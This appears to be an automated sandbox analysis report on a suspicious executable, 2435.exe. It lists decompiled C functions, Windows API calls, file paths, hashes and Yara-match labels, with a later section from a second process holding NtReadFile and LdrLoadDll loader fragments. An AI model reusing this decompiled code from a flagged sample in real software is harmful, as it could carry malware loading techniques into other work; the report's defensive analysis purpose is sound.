VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024b8
0x00401561
0x00402833
0x0040288e
0x0040289a

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040397c
0x00403981
0x00403987
0x0040398c
0x0040398c
0x00403994
0x00000000
0x00000000
0x0040399c
0x004039a4
0x004039a6
0x004039ac
0x004039ac
0x004039ae
0x004039ba
0x00000000
0x00000000
0x004039be
0x00000000
0x00000000
0x00000000
0x004039c0
0x004039c5
0x004039ce
0x004039d4
0x004039d9
0x004039ed
0x004039f8
0x00403a10
0x00403a16
0x00403a1b
0x00403a23
0x00403a44
0x00403a44
0x00403a44
0x00403a25
0x00403a27
0x00403a27
0x00403a2b
0x00403a32
0x00403a32
0x00403a37
0x00403a3d
0x00403a3d
0x00000000
0x00403a27
0x004039db
0x004039e0
0x004039e9
0x004039e2
0x004039e2
0x004039e2
0x004039e0

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10

Strings

1033, xrefs: 0040397C, 00403986, 004039F7
C:\Users\user\AppData\Local\Temp\, xrefs: 00403979

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-2030658151
Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}

0x00404e60
0x00404e85
0x00404ea5
0x00404ea8
0x00404eab
0x00404ec2
0x00404ec8
0x00404ecf
0x00404ed6
0x00404edd
0x00404ee2
0x00404ee8
0x00000000
0x00404ef8
0x00404e92
0x00404ee5
0x00404ee5
0x00000000
0x00404ee5
0x00404e9e
0x00404ea0
0x00000000
0x00404ea0
0x00404e66
0x00000000
0x00000000
0x00404e6d
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404E8A
CallWindowProcA.USER32 ref: 00404EF8

Part of subcall function 00403F64: SendMessageA.USER32 ref: 00403F76

Strings

, xrefs: 00404E62

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsq166.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024be
0x004024be
0x004024c1
0x004024dc
0x004024c3
0x004024c5
0x004024ca
0x004024d1
0x004024e3
0x0040265c
0x0040265c
0x004024e9
0x004024fb
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x0040288e
0x0040289a

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB

Strings

C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll, xrefs: 004024CA, 004024EF

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll
API String ID: 427699356-2501640230
Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D

Uniqueness

Uniqueness Score: -1.00%

Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}

0x0040361b
0x00403623
0x0040362a
0x0040362d
0x0040362d
0x0040362f
0x00403634
0x0040363b
0x00403641
0x00403645
0x00403646
0x0040364e

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\2435.exe" ,00000000,7519F560,004035F1,00000000,0040342D,00000000), ref: 00403634
GlobalFree.KERNEL32 ref: 0040363B

Strings

"C:\Users\user\Desktop\2435.exe" , xrefs: 0040362C

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\Desktop\2435.exe"
API String ID: 1100898210-3069706824
Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004056a1
0x004056ab
0x004056ad
0x004056b4
0x004056bc
0x00000000
0x00000000
0x00000000
0x004056bc
0x004056be
0x004056c3

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2435.exe,C:\Users\user\Desktop\2435.exe,80000000,00000003), ref: 004056A6
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2435.exe,C:\Users\user\Desktop\2435.exe,80000000,00000003), ref: 004056B4

Strings

C:\Users\user\Desktop, xrefs: 004056A0

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD

Uniqueness

Uniqueness Score: -1.00%

Function 733510E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E733510E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7335405c = _a8;
				 *0x73354060 = _a16;
				 *0x73354064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73354038, E73351556, _t52);
				_t43 =  *0x7335405c +  *0x7335405c * 4 << 2;
				_t17 = E7335123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73351266(E733512AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E733512D1( *_t55 - 0x30, E7335123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73354030;
								 *0x73354030 = _t31;
								E73351508(_t31 + 4,  *0x73354064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73354030;
							if( *0x73354030 != 0) {
								E73351508( *0x73354064, _t34 + 4, _t43);
								_t37 =  *0x73354030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73354030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x733510e7
0x733510ef
0x73351103
0x7335110b
0x73351116
0x73351119
0x73351121
0x73351124
0x73351126
0x733511c4
0x733511d0
0x7335112c
0x7335112d
0x7335112d
0x73351130
0x73351131
0x73351134
0x73351203
0x73351206
0x7335119e
0x733511a4
0x733511ac
0x733511b1
0x733511b4
0x00000000
0x733511b4
0x73351209
0x7335120a
0x73351186
0x7335118c
0x73351194
0x00000000
0x73351194
0x73351152
0x73351153
0x7335115b
0x73351168
0x73351170
0x73351179
0x7335117e
0x7335117e
0x00000000
0x73351153
0x7335113a
0x733511d1
0x733511d1
0x733511d8
0x733511e5
0x733511ea
0x733511ef
0x733511f5
0x733511fb
0x733511fb
0x00000000
0x733511d8
0x73351140
0x73351143
0x00000000
0x00000000
0x73351149
0x7335114c
0x7335119b
0x00000000
0x7335119b
0x7335114f
0x73351150
0x73351183
0x00000000
0x73351183
0x00000000
0x733511ba
0x733511ba
0x00000000
0x733511c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7335115B
GlobalFree.KERNEL32 ref: 733511B4
GlobalFree.KERNEL32 ref: 733511C7
GlobalFree.KERNEL32 ref: 733511F5

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: ba75b2e18c01f59379a25a6fe9f24d55687618f16e3362a71a48079f8179ed79
Instruction ID: 6bd8e73103657a2ea867dd7f2689cfb1903e487ce4cccb8ed4bf726b1208e2cc
Opcode Fuzzy Hash: ba75b2e18c01f59379a25a6fe9f24d55687618f16e3362a71a48079f8179ed79
Instruction Fuzzy Hash: 02317CB3D04254AFEF31AF76D948F26BFBCEB05250B384555F84AC7250D6389901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004057be
0x004057c0
0x004057e8
0x004057cd
0x004057d2
0x004057dd
0x00000000
0x004057fa
0x004057e6
0x004057e6
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 2435.exe PID: 6340 Parent PID: 6304 2435.exeCOMMON

Executed Functions

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 6663b026e105d7f6853f4d559d4a456aafc6f28bb1ddccbe58ecaba56839d856
Instruction ID: 397840b7226cff0a8c2a273405c0de42f80a15c4c86648141e34fcbd4ab4520d
Opcode Fuzzy Hash: 6663b026e105d7f6853f4d559d4a456aafc6f28bb1ddccbe58ecaba56839d856
Instruction Fuzzy Hash: 7EF0E2B6200108ABDB04DFA9DC80EEB77A9FF8C354F058649FA0DA7255D630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(__eflags != 0) {
						E0041CCF0(__eflags,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

